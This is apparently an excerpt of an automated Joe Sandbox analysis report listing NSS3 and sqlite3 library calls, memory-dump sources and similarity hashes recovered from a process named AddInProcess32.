                                                                                        • Part of subcall function 6CC66129: sqlite3_value_blob.NSS3(00000000,?,?), ref: 6CC66139
                                                                                      • sqlite3_column_bytes.NSS3(00000006,00000004,00000006,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC81D8A
                                                                                        • Part of subcall function 6CC66528: sqlite3_value_bytes.NSS3(00000000,?,?), ref: 6CC66538
                                                                                      • sqlite3_column_int64.NSS3(00000006,00000001,00000006,00000004,00000006,00000004,?,?,?,?,?,?,?,?,?,?), ref: 6CC81D94
                                                                                        • Part of subcall function 6CC81BF3: sqlite3_free.NSS3(?,?,?,?,00000000,00000000,00000248), ref: 6CC81CEB
                                                                                        • Part of subcall function 6CC81BF3: sqlite3_free.NSS3(?,?,?,?,?,00000000,00000000,00000248), ref: 6CC81CF3
                                                                                      • sqlite3_reset.NSS3(00000006,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000,?), ref: 6CC81DCB
                                                                                      • sqlite3_free.NSS3(00000006), ref: 6CC81E68
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,6CC9C195), ref: 6CC81EB0
                                                                                      • sqlite3_bind_int64.NSS3(?,00000002,00000247,00000000,?,00000001,?,6CC9C195), ref: 6CC81EC6
                                                                                      • sqlite3_step.NSS3(?,?,00000002,00000247,00000000,?,00000001,?,6CC9C195), ref: 6CC81ECC
                                                                                        • Part of subcall function 6CC65EFB: sqlite3_mutex_enter.NSS3(?), ref: 6CC65F2E
                                                                                        • Part of subcall function 6CC65EFB: sqlite3_mutex_leave.NSS3(?), ref: 6CC6607F
                                                                                      • sqlite3_reset.NSS3(?,?,?,00000002,00000247,00000000,?,00000001,?,6CC9C195), ref: 6CC81ED2
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_enter.NSS3(?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC6667F
                                                                                        • Part of subcall function 6CC6666E: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CCA9B01,?,?,?,?,6CC65F40,?), ref: 6CC666BC
                                                                                        • Part of subcall function 6CC812DB: sqlite3_mprintf.NSS3(SELECT %s WHERE rowid=?,6CD5A1EC,00000000,00000000,00000000), ref: 6CC81482
                                                                                        • Part of subcall function 6CC812DB: sqlite3_bind_value.NSS3(?,00000001,00000000,00000000,00000000,00000000), ref: 6CC81510
                                                                                      • sqlite3_bind_int64.NSS3(00000000,00000001,00000248,00000000), ref: 6CC81F07
                                                                                        • Part of subcall function 6CC6EF9A: sqlite3_mutex_leave.NSS3(?,?,?,?,?,6CC65052,?,?,?,?,?,00000000), ref: 6CC6F014
                                                                                      • sqlite3_bind_int64.NSS3(00000000,00000003,00000006,?,00000000,00000002,?,00000006,00000000,00000000,00000000,00000001,00000248,00000000), ref: 6CC81F28
                                                                                      • sqlite3_bind_int.NSS3(00000000,00000004,?,00000000,00000003,00000006,?,00000000,00000002,?,00000006,00000000,00000000,00000000,00000001,00000248), ref: 6CC81F33
                                                                                      • sqlite3_step.NSS3(00000000), ref: 6CC81F3C
                                                                                        • Part of subcall function 6CC65EFB: sqlite3_sql.NSS3(?), ref: 6CC65F5F
                                                                                        • Part of subcall function 6CC65EFB: sqlite3_reset.NSS3(?), ref: 6CC66006
                                                                                        • Part of subcall function 6CC65EFB: sqlite3_value_text.NSS3(?), ref: 6CC66032
                                                                                      • sqlite3_reset.NSS3(00000000,00000000), ref: 6CC81F42
                                                                                      • sqlite3_free.NSS3(?,?,?,00000000,00000000,?,00000000,?,?,00000006,?,00000000,00000000,00000000,?,6CC9C195), ref: 6CC81F51
                                                                                      • sqlite3_free.NSS3(00000000,?,?,?,00000000,00000000,?,00000000,?,?,00000006,?,00000000,00000000,00000000), ref: 6CC81F57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_int64sqlite3_free$sqlite3_mutex_leavesqlite3_reset$sqlite3_step$sqlite3_bind_intsqlite3_mprintfsqlite3_mutex_enter$sqlite3_bind_parameter_countsqlite3_bind_valuesqlite3_column_blobsqlite3_column_bytessqlite3_column_int64sqlite3_sqlsqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                      • String ID:
                                                                                      • API String ID: 3511438209-0
                                                                                      • Opcode ID: 4947cfeb31f2c2a0a409b910303d6d60fe3a3df825050cd636eeb8faa3f4ff00
                                                                                      • Instruction ID: bce353eeef715c0e11960375b0296f01ddceea6339fdea0cc27fd68987505adb
                                                                                      • Opcode Fuzzy Hash: 4947cfeb31f2c2a0a409b910303d6d60fe3a3df825050cd636eeb8faa3f4ff00
                                                                                      • Instruction Fuzzy Hash: B7717972D01219BBDB119FA9CD80EEFBBB9AF08758F144155F910B7B40F7359A118BA0
                                                                                      APIs
                                                                                      • sqlite3_malloc.NSS3(00000280,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6CC9BE0B
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • sqlite3_bind_int.NSS3(00000000,00000001,?,?,0000001C,00000000,00000000,00000000,?,00000008), ref: 6CC9BE8A
                                                                                      • sqlite3_step.NSS3(00000000,00000000,00000001,?,?,0000001C,00000000,00000000,00000000,?,00000008), ref: 6CC9BE90
                                                                                      • sqlite3_column_int64.NSS3(00000000,00000000,?,?,?,?,?,00000000,?,00000008), ref: 6CC9BEA0
                                                                                      • sqlite3_column_int.NSS3(00000000,00000001,00000000,00000000,?,?,?,?,?,00000000,?,00000008), ref: 6CC9BEAE
                                                                                      • sqlite3_reset.NSS3(00000000,?,?,?,?,?,00000000,?,00000008), ref: 6CC9BEC0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_intsqlite3_column_intsqlite3_column_int64sqlite3_initializesqlite3_mallocsqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 3746931136-0
                                                                                      • Opcode ID: 9f02c420f7bb5d8852da95e67dca360e0b3ff1fc4e338de2becadfcd04b6251b
                                                                                      • Instruction ID: df881e0d27e88fac866989d5268bd98ee90196da801f5f9af73beeadb51dba2f
                                                                                      • Opcode Fuzzy Hash: 9f02c420f7bb5d8852da95e67dca360e0b3ff1fc4e338de2becadfcd04b6251b
                                                                                      • Instruction Fuzzy Hash: E6E1A172C04609AFDF11DFA5C880BEEB7B9FF49318F244169E814E7640F7359A458BA4
                                                                                      APIs
                                                                                      • PORT_ArenaMark_Util.NSS3(?,?,?,00000000,?,00000000,00000000,?,?,?,?,?,00000000), ref: 6CD23E02
                                                                                        • Part of subcall function 6CD1C8A6: PR_Lock.NSS3(?,?,?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?), ref: 6CD1C8BA
                                                                                        • Part of subcall function 6CD1C8A6: PR_Unlock.NSS3(?,?,6CD1B9B6,?,?,?,6CCDCB3B,00000000,?,6CCDD2B9,?,?,6CCDCB3B,?,?,00000000), ref: 6CD1C8C9
                                                                                        • Part of subcall function 6CCF86D3: PK11_FindKeyByAnyCert.NSS3(?,?,?,?,?,6CD23E1E,?,?,?,?,00000000,?,00000000,00000000), ref: 6CCF86E0
                                                                                        • Part of subcall function 6CCF86D3: SECKEY_DestroyPrivateKey.NSS3(00000000,00000000,?,?,?,?,6CD23E1E,?,?,?,?,00000000,?,00000000,00000000), ref: 6CCF86F9
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23E2C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE060,?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23E36
                                                                                        • Part of subcall function 6CD1CB04: PR_SetError.NSS3(?,00000000,?,6CCDC9C2,FFFFE007,00000000,?,00000000), ref: 6CD1CB0C
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000038,?,?,00000000,?,00000000,00000000), ref: 6CD23E4C
                                                                                      • PORT_SetError_Util.NSS3(FFFFE013,?,?,?,00000000,?,00000000,00000000), ref: 6CD23E5E
                                                                                      • PORT_ArenaRelease_Util.NSS3(?,?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23E69
                                                                                      • PK11_IsInternal.NSS3(?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23EB2
                                                                                      • PK11_GetInternalKeySlot.NSS3(?,?,?,00000000,?,00000000,00000000), ref: 6CD23EBC
                                                                                      • PK11_ReferenceSlot.NSS3(?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23EC6
                                                                                      • PK11_FreeSlot.NSS3(00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23EEE
                                                                                      • PORT_ArenaZAlloc_Util.NSS3(?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 6CD23F08
                                                                                      • SECKEY_DestroyEncryptedPrivateKeyInfo.NSS3(?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CD23F32
                                                                                      • PT_FPrintStats.NSS3(?,?), ref: 6CD23FEE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Util$ArenaK11_$Slot$Alloc_DestroyError_InternalPrivateRelease_$CertEncryptedErrorFindFreeInfoLockMark_PrintReferenceStatsUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 374047588-0
                                                                                      • Opcode ID: 3d834546844dc62a8e7194a8a7115d6da77727bca770de00fa32fcddfd13077e
                                                                                      • Instruction ID: dfd70835a2b5a5a3a83e28a12d1c7591f7841a4f412527feca30a721b745e958
                                                                                      • Opcode Fuzzy Hash: 3d834546844dc62a8e7194a8a7115d6da77727bca770de00fa32fcddfd13077e
                                                                                      • Instruction Fuzzy Hash: 9E619275908209EEEF119F55DC40AEE7BF9AF0435CF200229FB5466A70E73AC9189B61
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(?,00000000,00000094,?,00000000), ref: 6CCCCCF0
                                                                                      • GetVersionExA.KERNEL32(?,?,?,00000000), ref: 6CCCCD05
                                                                                      • GetLastError.KERNEL32(?,?,00000000), ref: 6CCCCD0F
                                                                                        • Part of subcall function 6CCD0126: PR_SetError.NSS3(FFFFE896,?,?,6CCCE58F,00000000,?,6CCDA1DB,00000040,774CDF20,00000000,?,6CCD9F54,?,6CCC80C2,?), ref: 6CCD02F3
                                                                                      • ___swprintf_l.LIBCMT(?,?,Windows_98,?,?,00000000), ref: 6CCCCD84
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$LastVersion___swprintf_lmemset
                                                                                      • String ID: %d.%d$Windows_95$Windows_98$Windows_NT$Windows_Unknown
                                                                                      • API String ID: 2186594560-3588704869
                                                                                      • Opcode ID: fae2080a44810054e3a0da0a6587cfcd4c1ed0666791fb40a7afb889ea359bfc
                                                                                      • Instruction ID: 6180819faa8822ab288d6157ef6dce82955b154e3c1817cf11981093f06047c2
                                                                                      • Opcode Fuzzy Hash: fae2080a44810054e3a0da0a6587cfcd4c1ed0666791fb40a7afb889ea359bfc
                                                                                      • Instruction Fuzzy Hash: 1121A431B04128FBDF10AF79CC44FDA7B78BB02319F5041D6E90896E50EA359699CB83
                                                                                      APIs
                                                                                      • memset.VCRUNTIME140(6CC9C093,00000000,00000038,00000000,?,00000000,?,?,6CC9C093,?,?,00000006,00000000,00000248), ref: 6CC7BED5
                                                                                      • sqlite3_malloc.NSS3(?,6CC9C093,00000000,00000038,00000000,?,00000000,?,?,6CC9C093,?,?,00000006,00000000,00000248), ref: 6CC7BEE1
                                                                                        • Part of subcall function 6CC63C6C: sqlite3_initialize.NSS3(?,6CCB8B25,0000000A,6CC8C693,?,6CCAC4DC,?,6CD539E4,00000001), ref: 6CC63C6F
                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,00000006,00000000,00000248), ref: 6CC7BEFA
                                                                                      • sqlite3_bind_int64.NSS3(00000248,00000001,00000006,?,?,?,?,?,?,?,?,?,00000006,00000000,00000248), ref: 6CC7BF27
                                                                                      • sqlite3_step.NSS3(00000248,?,?,?,?,?,?,?,?,?,?,?,?,00000006,00000000,00000248), ref: 6CC7BF33
                                                                                      • sqlite3_column_bytes.NSS3(00000248,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000006), ref: 6CC7BF4F
                                                                                      • sqlite3_column_blob.NSS3(00000248,00000004,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7BF5A
                                                                                      • sqlite3_column_int64.NSS3(00000248,00000003,00000000,00000000,00000000), ref: 6CC7BF65
                                                                                      • sqlite3_column_int64.NSS3(00000248,00000002,00000000,?,00000000,00000000,00000000), ref: 6CC7BF71
                                                                                      • sqlite3_column_int64.NSS3(00000248,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 6CC7BF7D
                                                                                      • sqlite3_reset.NSS3(00000248,?,?,?,?,?,?,?,?,?,?,?,?,00000006,00000000,00000248), ref: 6CC7BFA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_column_int64$memset$sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_initializesqlite3_mallocsqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 19719458-0
                                                                                      • Opcode ID: 22fa3163f70ddb790c21fcf6526216508c4ac58b7a9413aa017423a92649781a
                                                                                      • Instruction ID: 2040ea0b11591055960f49a3a64caa0101d599bbb62e1e1093675d38bf653ed7
                                                                                      • Opcode Fuzzy Hash: 22fa3163f70ddb790c21fcf6526216508c4ac58b7a9413aa017423a92649781a
                                                                                      • Instruction Fuzzy Hash: 4821E172944614BEEB215E16AC82EBF3B7CDB82F64F100019FD00EAA81FB719D1586F1
                                                                                      APIs
                                                                                      • PR_SetError.NSS3(FFFFE8C1,00000000,?,00000000), ref: 6CCCEF6F
                                                                                      • _mbsinc.API-MS-WIN-CRT-MULTIBYTE-L1-1-0(?,?,00000000), ref: 6CCCEFE8
                                                                                      • FindFirstFileA.KERNEL32(?,?,?,00000000), ref: 6CCCEFFE
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 6CCCF00B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$FileFindFirstLast_mbsinc
                                                                                      • String ID: UUUU$\*.*
                                                                                      • API String ID: 2350909653-3193473139
                                                                                      • Opcode ID: d7f909faafc4262e744373aa76682cdcfa3515b2df81185398b54bc2e8e4fda5
                                                                                      • Instruction ID: 450f922c0a726fc2bc12a51a17d727f20e11b8f066d7e59aa9d2cb71e883aad8
                                                                                      • Opcode Fuzzy Hash: d7f909faafc4262e744373aa76682cdcfa3515b2df81185398b54bc2e8e4fda5
                                                                                      • Instruction Fuzzy Hash: 5031E7316092559FDB11CF78D844BC9BBB8AF07318F10429AD5D9D3680EF70A589CB91
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000000,?,?,?,00000000,00000000,00000000,?,?,?), ref: 6CC78D89
                                                                                      • sqlite3_bind_int64.NSS3(?,00000002,00000000,?,?,?,00000000,000003FF,?,00000001,00000000,?,?,?,00000000,00000000), ref: 6CC78DA4
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000000,?,?,?,00000000,?,00000000,?,?,?), ref: 6CC78DD4
                                                                                      • sqlite3_step.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6CC78DDD
                                                                                      • sqlite3_reset.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 6CC78DE3
                                                                                        • Part of subcall function 6CC78DF1: sqlite3_bind_int64.NSS3(?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E25
                                                                                        • Part of subcall function 6CC78DF1: sqlite3_bind_int64.NSS3(?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E35
                                                                                        • Part of subcall function 6CC78DF1: sqlite3_step.NSS3(?,?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E3D
                                                                                        • Part of subcall function 6CC78DF1: sqlite3_reset.NSS3(?,?,?,00000002,?,00000000,?,00000001,?,00000001,00000000,?,?,?), ref: 6CC78E45
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_int64$sqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 3032042052-0
                                                                                      • Opcode ID: aa47bad23f67d193e9a0276bc8dae690f159de7371bf8df24c24c5a6080bad4f
                                                                                      • Instruction ID: f248ef679167a753f3042f9d5838c50ea52858feff9ead7c9c5463d435ffab7a
                                                                                      • Opcode Fuzzy Hash: aa47bad23f67d193e9a0276bc8dae690f159de7371bf8df24c24c5a6080bad4f
                                                                                      • Instruction Fuzzy Hash: EB21017250410ABBEB125E968E41EFF377CEF69729F000056FE10B1940FB358A2156B2
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(00000000,00000001,00000006,?,?,00000006,00000248), ref: 6CC7BE4F
                                                                                      • sqlite3_bind_int.NSS3(00000000,00000002,00000248,00000000,00000001,00000006,?,?,00000006,00000248), ref: 6CC7BE5A
                                                                                      • sqlite3_step.NSS3(00000000,00000000,00000002,00000248,00000000,00000001,00000006,?,?,00000006,00000248), ref: 6CC7BE60
                                                                                      • sqlite3_reset.NSS3(00000000,00000000,00000000,00000002,00000248,00000000,00000001,00000006,?,?,00000006,00000248), ref: 6CC7BE66
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 4275396168-0
                                                                                      • Opcode ID: 70b602d4cbe38eceb69c4f8685f244d5bbd2f606ffa386fb2583ed1d5a8fac3a
                                                                                      • Instruction ID: d002572ab9c3cf31c2639cf2a38683d50ca463f295ca3893d2b3b0cae3e50612
                                                                                      • Opcode Fuzzy Hash: 70b602d4cbe38eceb69c4f8685f244d5bbd2f606ffa386fb2583ed1d5a8fac3a
                                                                                      • Instruction Fuzzy Hash: 4731A132901109EFDF218F65CD91A9FBBB6FF04358F244159FA0496B50F732E9519BA0
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000002,00000000,00000000,00000000,?,?), ref: 6CC9CE85
                                                                                      • sqlite3_step.NSS3(?,?,00000001,00000002,00000000,00000000,00000000,?,?), ref: 6CC9CE8B
                                                                                      • sqlite3_column_int.NSS3(?,00000000,?,?,?,?,?,00000000,00000000,?,?), ref: 6CC9CE9A
                                                                                      • sqlite3_reset.NSS3(?,?,?,?,?,?,00000000,00000000,?,?), ref: 6CC9CEBB
                                                                                        • Part of subcall function 6CC8060A: memset.VCRUNTIME140(?,00000000,00000038,00000000,?,?,?,?,6CC9CE2D,?,?,?,000000FF,?,?,6CC9DC66), ref: 6CC8062A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetsqlite3_bind_int64sqlite3_column_intsqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 4287317371-0
                                                                                      • Opcode ID: c207821a0c8eb5d0821d56305c0d70102b04d3a256babddc104b99177e1a9b7f
                                                                                      • Instruction ID: b079f184a6502f7ae9196c78e36c5ec0ca9a88ae3750844eaa8b8cb6597129a1
                                                                                      • Opcode Fuzzy Hash: c207821a0c8eb5d0821d56305c0d70102b04d3a256babddc104b99177e1a9b7f
                                                                                      • Instruction Fuzzy Hash: 5A213A72844B04AED7116A668DC1EFF72BDEB8536CF34052EE91793E80FB70AD464261
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,00000002,00000000,?,6CC81292,?), ref: 6CC78FB7
                                                                                      • sqlite3_bind_int.NSS3(?,00000002,00000008,?,00000001,00000002,00000000,?,6CC81292,?), ref: 6CC78FC2
                                                                                      • sqlite3_step.NSS3(?,?,00000002,00000008,?,00000001,00000002,00000000,?,6CC81292,?), ref: 6CC78FC8
                                                                                      • sqlite3_reset.NSS3(?,?,?,00000002,00000008,?,00000001,00000002,00000000,?,6CC81292,?), ref: 6CC78FCE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: sqlite3_bind_intsqlite3_bind_int64sqlite3_resetsqlite3_step
                                                                                      • String ID:
                                                                                      • API String ID: 4275396168-0
                                                                                      • Opcode ID: ca304f36dec3ae80c81c9e9157e71c4228247955f253f9fc489ec876fc34fc99
                                                                                      • Instruction ID: d0d0983b2073ccfdda94a957be5f02cbfe38aba3c130112689c9c5d4a6cd8358
                                                                                      • Opcode Fuzzy Hash: ca304f36dec3ae80c81c9e9157e71c4228247955f253f9fc489ec876fc34fc99
                                                                                      • Instruction Fuzzy Hash: 0101CE72905518BAEB209B66DD41FCF7BBCFF45718F100106FA04F2A40FB70A65486E1
                                                                                      APIs
                                                                                      • sqlite3_bind_int64.NSS3(?,00000001,?,?,?,00000000,?,6CC9B868,00000000,?,?,00000001,?,?,?,6CC7A226), ref: 6CC7897C
                                                                                        • Part of subcall function 6CC6525C: sqlite3_mutex_leave.NSS3(?,?,?,?,?,?,?,?,6CC65257,?,?,?), ref: 6CC65293
                                                                                      • sqlite3_step.NSS3(?,?,00000001,?,?,?,00000000,?,6CC9B868,00000000,?,?,00000001,?), ref: 6CC78988
                                                                                      • sqlite3_reset.NSS3(?), ref: 6CC7899C
                                                                                      • sqlite3_result_error_code.NSS3(00000000,00000000,?,00000000,?,6CC9B868,00000000,?,?,00000001,?,?,?,6CC7A226,?,?), ref: 6CC789C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
